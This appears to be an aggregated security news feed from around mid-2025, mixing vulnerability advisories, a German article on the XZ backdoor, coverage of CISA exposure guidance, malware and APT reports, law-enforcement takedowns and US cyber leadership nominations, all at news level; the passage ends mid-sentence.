This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of WOLFBOX Level 2 EV Charger. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-5750.

This vulnerability allows physically present attackers to bypass authentication on affected installations of WOLFBOX Level 2 EV Charger. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.6. The following CVEs are assigned: CVE-2025-5751.

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Revit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-5036.

As data privacy grows stronger, it becomes harder for security leaders to perform thorough background checks.

Um Ihre Software-Lieferkette zu schützen, kann Generative AI sehr hilfreich sein.NTPY -Shutterstock.com Es klingt wie ein Agentenkrimi: Unbekannten Drahtziehern ist es gelungen, eine Hintertür in der XZ-Kompressionsbibliothek, Teil vieler Open-Source-Plattformen, zu verstecken. Kompromittierte XZ-Bibliotheken können wiederum Secure-Shell (SSH) gefährden, das am häufigsten verwendete Tool für einen sicheren Fernzugriff. Potenziell sind sehr viele Server im Internet von der im Frühjahr 2024 entdeckten Lücke betroffen, weswegen das Bundesamt für Sicherheit in der Informationstechnik (BSI) im ersten Schritt genaue Prüfungen und die Installation der neuesten Sicherheits-Updates empfiehlt. Auch wenn die Security-Community nun umso wachsamer ist, gibt es für eine generelle Entwarnung keinen Grund. Solche elaborierten Supply-Chain-Attacken sind keine Seltenheit mehr. Die Software-Lieferketten stehen deshalb zunehmend unter Druck und eine einzelne Schwachstelle bei einem Player kann eine ganze Reihe weiterer Beteiligter treffen. Vor allem kleine Softwarehäuser können ins Visier der Angreifer geraten – nicht etwa, weil sie selbst interessant sind, sondern weil sie namhafte Unternehmen als Kunden haben. Auch deutsche Unternehmen sehen mittlerweile die drohende Gefahr: Laut der aktuellen GenAI-Studie von Elastic nehmen 97 Prozent aller befragten Unternehmen eine deutliche Gefährdung wahr und sehen sich Herausforderungen bezüglich ihrer IT-Sicherheit gegenüber. Doch wie können Unternehmen ihren Schutz vor solchen Angriffen verbessern? Der Schlüssel zu mehr Sicherheit: verhaltensbasierte Erkennung Maschinelles Lernen (ML) spielt in der Cybersecurity eine zunehmend größere Rolle. Wird hier zum Beispiel verhaltensbasierte Erkennung eingesetzt, kann das Verhalten aller im System laufenden Prozesse untersucht werden. Im Fokus steht dabei etwa, mit welchen anderen Prozessen sie Verbindungen herstellen oder welche Dateien sie öffnen. Schließlich können sie auch als gut- oder bösartig beurteilt werden. So werden die Daten aus verschiedenen verdächtigen Einzelaktivitäten zusammengefügt, verbunden mit der Feststellung, dass sie alle zu einem einzigen Angriff gehören. Hier kommt auch künstliche Intelligenz (KI) ins Spiel: Denn mit der Hilfe von maschinellem Lernen und Generative AI (GenAI) erhöht sich die Chance weiter, einzelne schwache Signale zu erkennen und zu sammeln. Jedes für sich genommen ist nicht bösartig genug, um einen Alarm auszulösen, aber kollektiv sind sie es – genau das definiert die Angriffserkennung als Muster. GenAI kann also in diesem Umfeld ein sehr nützliches Werkzeug sein. Das sehen auch die Teilnehmer der Elastic-Studie so: 100 Prozent der befragten deutschen Unternehmen geben an, dass sie generative KI innerhalb ihrer Security-Teams einsetzen wollen. Gerade in Verbindung mit ML kann generative KI bei einer Vielzahl von Aufgaben unterstützen – von der Untersuchung von Alerts über das Reagieren auf Sicherheitsvorfälle bis hin zum Generieren und Konvertieren von Suchanfragen mit Hilfe natürlicher Sprache. Je nach Tool unterstützen einfache integrierte Prompts bei der Anwendung ebenso wie selbst formulierte Prompts, die über das hinausgehen, was die integrierten Funktionen bieten. Vorbereitung ist das A und O Eine wichtige Abwehrlinie gegen Supply-Chain-Angriffe sind die Unternehmen selbst. Eine wirksame firmeninterne Cybersecurity setzt sich dabei aus vier Komponenten zusammen: Organisation, Prozesse, Menschen und Technologie. Zuerst braucht es einen ganzheitlichen Sicherheitsansatz im Unternehmen, der alle diese Aspekte von Anfang an berücksichtigt. Die primäre Aufgabe eines CISO ist es deshalb, die Cybersecurity umfassend im Auge zu behalten. Es müssen nicht nur konkrete Sicherheits-Prozesse aufgebaut, sondern auch Mitarbeiter geschult sowie für aktuelle Cyber-Bedrohungen sensibilisiert werden. So wurde etwa in dem Angriff auf XZ auch mit Social-Engineering-Methoden gearbeitet, um zum Beispiel den Maintainer der Bibliothek unter Druck zu setzen. In technischer Hinsicht sind eine einheitliche Datenplattform und der kombinierte Einsatz von maschinellem Lernen und generativer KI von zentraler Bedeutung. Lesetipp: Wie GenAI das Threat Hunting beschleunigt Regelmäßige Sicherheitsaudits und Tests von Netzwerken und Systemen helfen, Schwachstellen frühzeitig zu erkennen und zu beheben. Die Kommunikation zwischen den verschiedenen Abteilungen und ihren Mitarbeitern sollte ebenfalls gestärkt werden, damit das Unternehmen im Krisenfall schnell handlungsfähig ist. Nicht zuletzt muss natürlich die Lieferkette ständig überwacht werden. Keine Software ist perfekt – wenn Supply-Chain-Angriffe wie Solarwinds oder XZ öffentlich werden, gilt es sofort zu handeln und die betroffenen Programme sowie Bibliotheken auf Schwachstellen zu untersuchen und diese zu beheben. Ein entscheidendes Kriterium bei der Auswahl eines Software-Lieferanten muss daher sein: ein Informationssicherheitsteam mit soliden Prozessen, die exakt evaluiert und bewertet werden können. Wie schnell reagiert das Team auf die Meldung von Schwachstellen? Wie schnell werden sie behoben? Und wie offen und transparent wird kommuniziert? Je transparenter Software-Anbieter hier handeln und kommunizieren, desto eher werden sie zu einem zuverlässigen und unverzichtbaren Bestandteil der Lieferkette. Zusammenarbeit schützt Lieferketten Um Software-Lieferketten zu schützen, muss jeder Teil der Supply Chain etwas beitragen, damit es Cyberkriminellen nicht gelingt, durch die Infizierung einer einzelnen Stelle die ganze Kette zu gefährden. Für Unternehmen heißt dies, einen ganzheitlichen Sicherheitsansatz zu verfolgen und moderne Technologien wie maschinelles Lernen und generative KI einzusetzen und kontinuierlich weiterzuentwickeln. Hersteller sollten Informationssicherheit sehr ernst nehmen und schnell sowie transparent handeln – so werden Software-Lieferketten und darauf aufbauende Wirtschaftsbereiche bestmöglich geschützt. (jm)

The US Cybersecurity and Infrastructure Security Agency (CISA) this week issued guidance to infosec pros on ways they can find insecure IT and OT systems, including servers, databases, sensors, switches, routers, and industrial control systems, and shield them from the public internet. Misconfigured systems, default credentials, and outdated software are often easily discovered through free internet-based search and discovery platforms such as Shodan, Censys.io and Thingful, tools that crooks as well as defenders can use, the guidance warns. And the discovery this week of an unprotected 12TB database of sensitive personal information exposed on the internet is yet another example of how these mistakes or unpatched vulnerabilities leave crucial information held by organizations exposed for plucking. Guidance from CISA Solving the problem is simple for a CISO, the guidance said: Just ask, ‘Does this have to be open to the internet?’ That, of course, assumes they know every asset in their IT/OT environment, which means, to begin with, every organization has to do an asset inventory. There’s no shortage of vendors offering asset management software, and in some countries, their national cybersecurity agency (CISA in the US) may do vulnerability scans for organizations. Then the CISO has to evaluate which assets need to be internet-accessible for operational purposes by using these yardsticks: Necessity: Is the exposed system or service essential for operations? Business justification: What operational need requires this exposure? Security measures: Can you restrict access via VPNs or better secure it with multifactor authentication? Maintenance: Is the system or service up to date with the latest security patches? Assets and services that don’t have to be open to the internet should either be disconnected or have their access restricted. But make sure the changes don’t inadvertently disrupt essential services or operations, the CISA guidance adds. The third step is to mitigate risks to remaining exposed assets by: changing default passwords and enforcing strong authentication mechanisms; creating a patch management regime to ensure systems are patched; utilizing Virtual Private Networks (VPNs) to secure remote access; implementing multifactor authentication (MFA) where possible. Finally, CISOs should regularly review and monitor internet-accessible assets to make sure policy is being enforced. The guidance doesn’t mention it, but employee awareness training also plays a role, because some or all staff may have the ability to put an asset unsafely online directly, or through the use of a cloud storage platform (for example, Dropbox or an Amazon S3 data bucket) or a cloud data processing service (for example, Amazon AWS, Microsoft Azure). How big is the problem? It’s not easy to quantify the number of breaches of security controls and data thefts due to unpatched assets, or assets being online when they shouldn’t be, but the latest Verizon Data Breach Investigation report says 60% of the breaches it looked at involved a human element (including misconfigurations, errors, and credential abuse). Credential abuse was an initial access factor in 22% of the breaches, closely followed by exploitation of vulnerabilities (20%). But CISOs need to ask themselves how many breaches of security controls during their careers were related to things that shouldn’t have been exposed to the internet in the first place. Exposed assets, in particular, assets exposed without proper configuration and management, are a huge issue, said Johannes Ullrich, dean of research at the SANS Institute. Guidance ‘covers the basics’ “The data we collect at the Internet Storm Center shows that assets are scanned and discovered within minutes of being exposed,” he said in an email. “The top targets are exposed telnet and SSH servers with weak passwords, web-based admin consoles for various devices (cameras, firewalls, network storage devices), and remote access tools like [Windows] RDP.” This has become an even larger problem with so many applications being deployed in the cloud, he added, which does make it much more difficult to restrict access to them.  “The CISA guidance is making good points and covers the basics,” he said, “but the tricky part is to scale these efforts. Public search engines like Shodan and Censys are helpful [to infosec pros], but they should not replace regular scans from an external IP address.” Additional defenses The CISA recommendations fall into the category of core fundamentals that any organization has an obligation to address, said David Lewis, global advisory CISO at 1Password. “Defense in depth is essential.” While CISA’s guidance provides a solid foundation, he suggested some enhancements that can be employed: Identity and Access Management (IAM) is absolutely critical in cybersecurity. Misconfigurations and compromised credentials are significant vulnerabilities that plague our daily lives, especially as organizations adopt complex identity ecosystems. Incorporating detailed IAM strategies into exposure reduction efforts could strengthen the guidance. Device Trust and Compliance: Security programs should work to ensure that only trusted, compliant devices access organizational resources. The risks posed by unmanaged or non-compliant devices, or shadow IT, can be exploited by attackers. Thus integrating device compliance checks into exposure assessments could enhance security. “CISA’s guidance offers valuable steps for reducing internet exposure,” he said. “However, incorporating comprehensive IAM practices, extended access management, and device compliance measures could provide a more robust defense against cyber threats. By addressing these areas, organizations can better protect themselves against breaches stemming from unnecessary internet exposure.”

In today's rapidly evolving industrial landscape, the lines between Information Technology (IT) and Operational Technology (OT) are blurring like never before. For decades, these two domains operated in separate silos, each with distinct purposes, technologies, and security requirements. However, digital transformation, Industry 4.0 initiatives, and the growing demand for real-time data analytics are driving unprecedented convergence between IT and OT systems.

The U.S. Department of State has announced a reward of up to $10 million for any information on government-sponsored hackers with ties to the RedLine infostealer malware operation and its suspected creator, Russian national Maxim Alexandrovich Rudometov. The same bounty covers leads on state hackers' use of this malware in cyber operations targeting critical infrastructure organizations in the United States. This bounty is posted as part of the Department of State's Rewards for Justice program established by the 1984 Act to Combat International Terrorism, which rewards informants for tips that help identify or locate foreign government threat actors behind cyberattacks against U.S. entities.

The US government's Login.gov identity verification system could be one cyberattack, or just a routine IT hiccup, away from serious trouble, say auditors, because it hasn't shown its backup testing policy is actually in use or effective. The US Government Accountability Office reported Tuesday that Login.gov, which is managed by the federal government's General Services Administration (GSA) procurement branch, has mostly complied with prior recommendations to improve the seven-year-old centralized login service for US citizens. "Mostly" doesn't include any scheme to keep an eye on the state of its data backups, however, which could be disastrous if they had to be pulled out of storage to restore damaged systems.

The Ukrainian police arrested a 35-year-old hacker who breached 5,000 accounts at an international hosting company and used them to mine cryptocurrency, resulting in $4.5 million in damages. "The suspect illegally gained access to over 5,000 accounts belonging to clients of an international hosting company that provides server rental services for the operation of various websites and online platforms," reads the police's announcement. "After gaining access to these accounts, the perpetrator began unauthorized deployment of virtual machines (software that emulates a computer's operation) using the company's server resources." As the threat actor utilized the accounts to mine cryptocurrency on the hosting provider's servers, the resulting damages were estimated to be $4,500,000.

Ukrainian telcos and ISPs have leased their IPv4 holdings to stay afloat during the nation’s war with Russia. Network intelligence service provider Kentik advanced that theory last week in an analysis written by its director of internet analysis Doug Madory. The researcher found “several cases in which large amounts of IPv4 space, formerly originated by prominent Ukrainian [autonomous systems] ASes, have moved out of the country (often with the help of IPv4 brokers) to dozens of new origins, including major cloud providers, hosting operations, and international telecoms.” Madory thinks the result is “a dramatic reduction in Ukraine’s footprint in the global routing table — a new consequence of a protracted war in the digital age.”

Cisco Talos observed a destructive attack on a critical infrastructure entity within Ukraine, using a previously unknown wiper we are calling “PathWiper”. The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, that was then used to issue malicious commands and deploy PathWiper across connected endpoints. Talos attributes this disruptive attack and the associated wiper to a Russia-nexus advanced persistent threat (APT) actor. Our assessment is made with high confidence based on tactics, techniques and procedures (TTPs) and wiper capabilities overlapping with destructive malware previously seen targeting Ukrainian entities. The continued evolution of wiper malware variants highlights the ongoing threat to Ukrainian critical infrastructure despite the longevity of the Russia-Ukraine war.

Nearly 145 domains associated with the BidenCash cybercriminal marketplace were taken down on Wednesday in a law enforcement operation led by U.S. and Dutch authorities. BidenCash, which appropriated the name and image of the former U.S. president, has existed since 2022 and was used primarily as a way to sell stolen credit card numbers, compromised credentials and personal information. The U.S. Department of Justice (DOJ) said that at its peak, the platform had more than 117,000 customers and generated $17 million in revenue from the sale of about 15 million payment card numbers and troves of personal information. Several domains associated with the site have been replaced with splash images showing the insignias of the DOJ, FBI, U.S. Secret Service and the Dutch High Tech Crime Unit.

In 2024, ESET researchers discovered several malicious tools in the systems used by Kurdish and Iraqi government officials. The APT group behind the attacks is BladedFeline, an Iranian threat actor that has been active since at least 2017, when it compromised officials within the Kurdistan Regional Government (KRG). This group develops malware for maintaining and expanding access within organizations in Iraq and the KRG. While this is our first blogpost covering BladedFeline, we discovered the group in 2023, after it targeted Kurdish diplomatic officials with the Shahmaran backdoor, and previously reported on its activities in ESET APT Activity reports Q4 2023-Q1 2024 and Q2 2024-Q3 2024. BladedFeline is an Iran-aligned cyberespionage group, active since at least 2017 according to ESET telemetry. We discovered the group in 2023 when it deployed its Shahmaran backdoor against Kurdish diplomatic officials.

Cisco has released patches to address three vulnerabilities with public exploit code in its Identity Services Engine (ISE) and Customer Collaboration Platform (CCP) solutions. The most severe of the three is a critical static credential vulnerability tracked as CVE-2025-20286, found by GMO Cybersecurity's Kentaro Kawane in Cisco ISE. This identity-based policy enforcement software provides endpoint access control and network device administration in enterprise environments. The vulnerability is due to improperly generated credentials when deploying Cisco ISE on cloud platforms, resulting in shared credentials across different deployments. Unauthenticated attackers can exploit it by extracting user credentials from Cisco ISE cloud deployments and using them to access installations in other cloud environments. However, as Cisco explained, threat actors can exploit this flaw successfully only if the Primary Administration node is deployed in the cloud.

Mass layoffs create cybersecurity vulnerabilities through dormant accounts and disgruntled employees.

A vulnerability in Amazon Web Services (AWS), Microsoft Azure, and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems. This vulnerability exists because credentials are improperly generated when Cisco ISE is being deployed on cloud platforms, resulting in different Cisco ISE deployments sharing the same credentials. These credentials are shared across multiple Cisco ISE deployments as long as the software release and cloud platform are the same. An attacker could exploit this vulnerability by extracting the user credentials from Cisco ISE that is deployed in the cloud and then using them to access Cisco ISE that is deployed in other cloud environments through unsecured ports. A successful exploit could allow the attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems. Note: If the Primary Administration node is deployed in the cloud, then Cisco ISE is affected by this vulnerability. If the Primary Administration node is on-premises, then it is not affected. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-aws-static-cred-FPMjUcm7 Security Impact Rating: Critical CVE: CVE-2025-20286

De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.

De multiples vulnérabilités ont été découvertes dans le noyau Linux de Red Hat. Elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données, un déni de service et un problème de sécurité non spécifié par l'éditeur.

De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Certaines d'entre elles permettent à un attaquant de provoquer un déni de service à distance, une atteinte à la confidentialité des données et un contournement de la politique de sécurité.

The post Customer Story: Canadian Construction Firm appeared first on Graylog.

The post Customer Story: U.S. Education IT Provider appeared first on Graylog.

Google's AI advancement is not slowing down, and we might be getting yet another powerful model codenamed "Gemini Kingfall."

The post Customer Story: Australian Media Company appeared first on Graylog.

Any info on Maxim Rudometov and his associates? There's $$$ in it for you The US government is offering up to $10 million for information on foreign government-backed threat actors linked to the RedLine malware, including its suspected developer, Maxim Alexandrovich Rudometov.

OpenAI is planning to ship an update to ChatGPT that will turn on the new o3 Pro model, which has more compute to think harder.

Ukraine has seen nearly one-fifth of its Internet space come under Russian control or sold to Internet address brokers since February 2022, a new study finds. The analysis indicates large chunks of Ukrainian Internet address space are now in the hands of proxy and anonymity services nested at some of America's largest Internet service providers (ISPs).

AI is increasingly embedded into threat detection and response tools, but hallucinations can lead to false positive and inaccurate guidance. The AI-associated risk can't be completely eradicated, but SecOps teams can take steps to at least limit the effects.

Recent Attacks Highlight Elevated Threat to Israeli and Jewish Communities

Authorities said they froze and seized the allegedly illegally obtained funds when North Korean nationals attempted to launder money linked to the long-running conspiracy. The post DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme appeared first on CyberScoop.

Authorities said they froze and seized the allegedly illegally obtained funds when North Korean nationals attempted to launder money linked to the long-running conspiracy. The post DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme appeared first on CyberScoop.

Re-selling info from an earlier breach? Probably. But which one? AT&T is investigating claims that millions of its customers' data are listed for sale on a cybercrime forum in what appears to be a re-release from an earlier hack.

Rep. Jamie Raskin, D-Md., ranking member of the House Judiciary Committee, said "forcing companies to circumvent their own encrypted services in the name of security is the beginning of a dangerous slippery slope."

The FBI is warning that the BADBOX 2.0 malware campaign has infected over 1 million home Internet-connected devices, converting consumer electronics into residential proxies that are used for malicious activity.

The post Customer Story: Indian Construction IT Team appeared first on Graylog.

The post Customer Story: Indian Public Education Provider appeared first on Graylog.

The post Customer Story: Global IT Services Firm appeared first on Graylog.

The post Customer Story: U.S. Energy Provider appeared first on Graylog.

The post Customer Story: Irish IT Services Firm appeared first on Graylog.

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Google Chromium V8 vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Google Chromium V8 Out-of-Bounds Read and Write Vulnerability, tracked as CVE-2025-5419, to its Known Exploited Vulnerabilities (KEV) catalog. This week, Google released out-of-band updates to address three vulnerabilities […]

Introduction to Unified Access Control and ZTNA Protecting vital data and infrastructure is crucial. Zero Trust Network Access (ZTNA) has emerged as a fundamental strategy for reducing cybersecurity risks, insisting that organizations verify every interaction within their networks. Unified Access Control (UAC) complements ZTNA by providing enhanced visibility and control over user access, regardless of… The post Powering ZTNA Strategies with Unified Access Control appeared first on Portnox.

Cellebrite, a controversial digital forensics firm, is set to acquire virtualization vendor Corellium in a $170 million deal.

Skybox Is Gone. The Risk of Waiting Isn’t. Skybox is gone, but your compliance deadlines, audit obligations, and security risks are very much alive. Here’s why EMEA organisations must act...

Amid a major Chinese intrusion into U.S. telecoms, New York Republican Rep. Andrew Garbarino says CISA’s Mobile App Vetting program shouldn’t be terminated.

Cisco Talos researchers observed the new wiper malware in a destructive attack against an unnamed critical infrastructure organization.

The vulnerability, with a 9.9 CVSS score on a 10-point scale, results in different Cisco ISE deployments all sharing the same credentials as long as the software release and cloud platform remain the same.

Acronis researchers reported that new Chaos RAT variants were employed in 2025 attacks against Linux and Windows systems. Acronis TRU researchers discovered new Chaos RAT variants targeting Linux and Windows in recent attacks. Originally seen in 2022, Chaos RAT evolved in 2024, with fresh samples emerging in 2025. TRU also discovered a critical flaw in […]

Are you struggling with traditional LAN environments that lead to slow, error-prone manual setups, poor visibility and security for IoT/OT devices, inconsistent security enforcement, complex management, costly and challenging scaling, and slow response to performance and security issues? The post Revolutionizing Your LAN: Seamless Management and Complete Visibility with Versa Secure SD-LAN first appeared on The Versa Networks Blog.

Trump-pardoned hacker Chris Wade will join the company as CTO Cellebrite has announced a $170 million deal to buy Corellium, bringing together two companies that have made names for themselves by helping law enforcement break into encrypted devices.

Sean Cairncross said his managerial experience has prepared him well to lead a relatively new White House cyber unit.

Sean Cairncross said his managerial experience has prepared him well to lead a relatively new White House cyber unit.

Plus: Plankey's confirmation process 'temporarily delayed' Sean Cairncross, President Donald Trump's nominee to serve as national cyber director, doubled down on taking offensive cyber actions against foreign adversaries during a Senate homeland security committee nomination hearing on Thursday, and refused to condemn the president's proposed cuts to the main US cyber defense agency.

Censys researchers follow some clues and find hundreds of control-room dashboards for US water utilities on the public internet. The post Misconfigured HMIs Expose US Water Systems to Anyone With a Browser appeared first on SecurityWeek.

ESET researchers have uncovered the persistent activities of BladedFeline, an Iranian-aligned Advanced Persistent Threat (APT) group, which has maintained covert access to the networks of Kurdish and Iraqi government officials for nearly eight years. First identified in 2017 through attacks on the Kurdistan Regional Government (KRG), BladedFeline has since evolved into a sophisticated cyberespionage entity, […] The post Iranian APT ‘BladedFeline’ Remains Hidden in Networks for 8 Years appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

The new plan builds on Biden-era work, but how implementation goes during Trump-era workforce reductions remains to be seen.

Alleged data breach of NBN Co

The following is a guest post from Troy Leach, Former Executive on the PCI Security Standards Counsel and Chief Strategy Officer at CSA. As I walked into the Moscone Center last month, I realized that this was likely my 20th year at the RSAC. It often feels like a mini-reunion.  In fact, I stopped to […] The post Tracking the Big Shifts in Cybersecurity: From AI Code Generation to Third-Party Oversight appeared first on HUMAN Security.

A new wave of cyber threats has emerged with the discovery of updated variants of Chaos RAT, a notorious open-source remote administration tool (RAT) first identified in 2022. As reported by Acronis TRU researchers in their recent 2025 analysis, this malware continues to evolve, targeting both Linux and Windows environments with sophisticated capabilities for espionage […] The post New Chaos RAT Targets Linux and Windows Users to Steal Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Home Internet Connected Devices Facilitate Criminal Activity

Crypto-tracing firm Chainalysis says the mysterious 300-bitcoin donation to the pardoned Silk Road creator appears to have come from someone associated with a different defunct black market: AlphaBay.

The cybersecurity landscape witnessed the emergence of new PowerShell-based malware samples circulating in underground forums and threat-hunting communities, marking a significant evolution of the notorious ViperSoftX stealer. This updated variant, building on its 2024 predecessor, showcases remarkable advancements in modularity, stealth, and persistence mechanisms, posing a heightened threat to cryptocurrency users and enterprises. Detailed analysis […] The post ViperSoftX Malware Enhances Modularity, Stealth, and Persistence Techniques appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Extensive intel and expert analysis make our Threat Hunters a key component in protecting organizations from today’s critical threats

Sophos researchers found this operation has similarities or connections to many other campaigns targeting GitHub repositories dating back to August 2022.

Censys researchers said hundreds of water treatment facilities have taken steps to protect against malicious cyber intrusions.

Censys researchers said hundreds of water treatment facilities have taken steps to protect against malicious cyber intrusions.

China has accused Taiwan’s Democratic Progressive Party (DPP) authorities of orchestrating a series of sophisticated cyber attacks through Advanced Persistent Threat (APT) groups. Referred to as “T-APTs,” these groups are allegedly supported by Taiwan’s Information, Communications and Electronic Force Command (ICEFCOM) and are claimed to have close ties with the United States. Allegations of Cyber […] The post China Accuses Taiwan of Operating APT Groups with US Support appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

2017 ransomware attack on shipping company A P Moller Maersk marked a turning point for the cybersecurity industry, according to its former CISO Adam Banks

In today’s ever-evolving security landscape, organizations face an unprecedented expansion of digital assets—and with that expansion comes a growing attack surface. We’re proud to announce that Qualys has been named The Leader in the 2025 KuppingerCole Leadership Compass for Attack Surface Management (ASM), a testament to our commitment to providing comprehensive and proactive cybersecurity solutions. […]

In this week's newsletter, Martin emphasizes that awareness, basic cyber hygiene and preparation are essential for everyone, and highlights Talos' discovery of the new PathWiper malware.

Security debt is emerging as a critical concern for IT and security teams. As businesses rapidly adopt new technologies, many carry forward legacy systems, unpatched software, and outdated security practices. These unresolved vulnerabilities accumulate over time and can spiral into significant risk, financial loss, and compliance failures.  This blog explores what security debt is, how it builds up, the dangers it poses, and how organizations—particularly in... Read more » The post The Growing Risk of Security Debt appeared first on Plixer.

Sean Plankey, tapped to lead CISA, did not appear at a Thursday hearing due to reported clearance-related delays, but his name was still added to a list of nominees to be voted on next week.

In his Senate confirmation hearing, national cyber director nominee Sean Cairncross faced questions about his lack of cybersecurity experience and how the government would operate with vastly reduced cybersecurity resources.

In his Senate confirmation hearing, national cyber director nominee Sean Cairncross faced questions about his lack of cybersecurity experience and how the government would operate with vastly reduced cybersecurity resources.

In his Senate confirmation hearing, national cyber director nominee Sean Cairncross faced questions about his lack of cybersecurity experience and how the government would operate with vastly reduced cybersecurity resources.

While I’ve been in the household financial security field for two decades now, I started out planning for a career in economic policy. I majored in economics, and earned a master’s degree in economic policy, because I believe that how we design our economy is critical to whether or not all people and communities in […] The post It’s Time to Connect Financial Security and Economic Policy appeared first on The Aspen Institute.

In the wake of the COVID-19 pandemic, collaborative tools like Microsoft Teams, Zoom, and WebEx have become indispensable for remote work, enabling seamless communication with colleagues and clients. However, their widespread adoption has also made them prime targets for cybercriminals. A recent phishing campaign exploiting the popularity of Zoom has surfaced, tricking users into downloading […] The post Beware of Fake Zoom Client Downloads Granting Attackers Access to Your Computer appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

A massive data leak has put the personal information of over 3.6 million app creators, influencers, and entrepreneurs…

The nominee, who doesn’t have as much cyber experience as his predecessors, also touted his credentials and views on current threats during his Senate confirmation hearing. The post Sean Cairncross has policy coordination in mind if confirmed as national cyber director appeared first on CyberScoop.

The nominee, who doesn’t have as much cyber experience as his predecessors, also touted his credentials and views on current threats during his Senate confirmation hearing. The post Sean Cairncross has policy coordination in mind if confirmed as national cyber director appeared first on CyberScoop.

A threat actor has re-released data from a 2021 AT&T breach affecting 70 million customers, this time combining previously separate files to directly link Social Security numbers and birth dates to individual users.

Official Juniper Networks Blogs Stage 4 on a journey to the Self-Driving Network™: assisted At this point in our journey to the Self-Driving Network, we’ve covered data—the foundation of an AI-native network—and explored how it’s processed in the cloud and translated into insights and The post Stage 4 on a journey to the Self-Driving Network™: assisted appeared first on Official Juniper Networks Blogs.

Alleged breach of Weguest – 2.5M Records Exposed via API Misconfiguration

A newly identified malicious plugin, dubbed “wp-runtime-cache,” has been discovered targeting WordPress sites with a sophisticated method to steal admin credentials. Disguised as a caching plugin, this malware lurks in the wp-content/plugins directory, evading detection by hiding from the WordPress admin panel’s plugin list. Unlike legitimate caching plugins that typically offer visible settings or management […] The post WordPress Admins Cautioned About Fake Cache Plugin Stealing Admin Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Dark web crime platform raked in $17M+ over three years of operation Uncle Sam has seized 145 domains tied to BidenCash, the notorious dark web market that trafficked in more than 15 million stolen credit cards.

The company's custom AI models are now available for classified environments in government.

Measuring the impact of upskilling is crucial for demonstrating its value and driving continuous improvement. The post Upskilling Playbook: Metrics appeared first on The Aspen Institute.

Microsoft will spotlight ​​its AI-first, end-to-end security platform at the Gartner Security & Risk Management Summit. Read our blog post for details on how to connect with us there and a teaser of what to expect from our sessions.​​ The post Connect with us at the Gartner Security & Risk Management Summit appeared first on Microsoft Security Blog.

Hackers are actively exploiting CVE-2025-49113, a critical vulnerability in the widely used Roundcube open-source webmail application that allows remote execution.

Since the start of the Trump administration, the US federal government’s two top cybersecurity leadership positions have been vacant, but those roles are finally on the path to being filled. The first job is the director of the Cybersecurity and Infrastructure Security Agency (CISA), which has been vacant since former director Jen Easterly left on Jan. 20. The second slot is the national cyber director, a role in the Executive Office of the President, last held by Harry Coker, who moved on to become the State of Maryland’s Commerce Secretary. President Trump nominated cybersecurity newcomer Sean Cairncross on Feb. 11 to succeed Coker and, a month later, named cybersecurity veteran Sean Plankey for the CISA position. Tech and cybersecurity leaders have sent Senators glowing endorsements of Plankey and Cairncross. Both candidates were slated to testify at a confirmation hearing today, but Plankey’s testimony was inexplicably canceled the day before this hearing. Although Cairncross did testify at this hearing, he will also face another confirmation hearing before the same committee on June 12, when Plankey is again scheduled to testify. The only lawmaker opposing either candidate is Senator Ron Wyden (D-OR), who is trying to hold up Plankey’s nomination to force CISA to release a report related to the Chinese threat actor Salt Typhoon. A spokesperson told CSO that Sen. Wyden’s original statement on the hold still applies. “Both of these Seans are good leaders,” Mark Montgomery, senior director of the Center on Cyber and Technology Innovation at the Foundation for the Defense of Democracies, told CSO. “Plankey, in particular, has broad expertise on the issue. Cairncross has leadership experience with the White House team. These two confirmations will set the Trump administration up for cyber success if it chooses to take it.” However, both candidates will face significant challenges once they assume their positions. The administration will be forced to play catch-up after largely overlooking most critical cyber policy issues due to turmoil caused by chaotic DOGE-induced job reductions and transitional disorientation typical of any new administration. Workforce and funding challenges The biggest challenge that Plankey will face at CISA is a dramatically reduced workforce. One report suggests that the agency has already lost 1,000 employees, or around 30% of its workforce, through buyouts, firings, and voluntary departures amid DOGE job slashing and still-lingering partisan scorn of the group’s brief work on misinformation efforts years ago. The pain of the staff cuts is compounded by the loss of experience and expertise held by staffers who have left. On May 22, CISA’s new No. 2 employee, Madhu Gottumukkala, sent a memo to staff saying that the heads of three of CISA’s six main divisions — cybersecurity, infrastructure security, and integrated operations, which oversees regional offices — were all leaving at the end of May, along with the deputy head of a fourth. The memo further said the leaders of most regional offices are also leaving, along with the top CISA officers for finance, strategy, human resources, and contracting. Some observers suggest that the staff reduction CISA has already experienced meets the estimated 1,000 CISA job cuts the administration has planned for the agency in its FY2026 budget proposal, obviating the need for any further job cuts. Montgomery, however, isn’t so sure, given the loss of leadership and rare talent. “Some of the people who’ve left, they have to replace,” he said. “My gut reaction is that they have to hire 150 people with specific skill sets, which means they may still go find another 150 to get rid of.” In addition, the administration’s budget expects CISA’s other 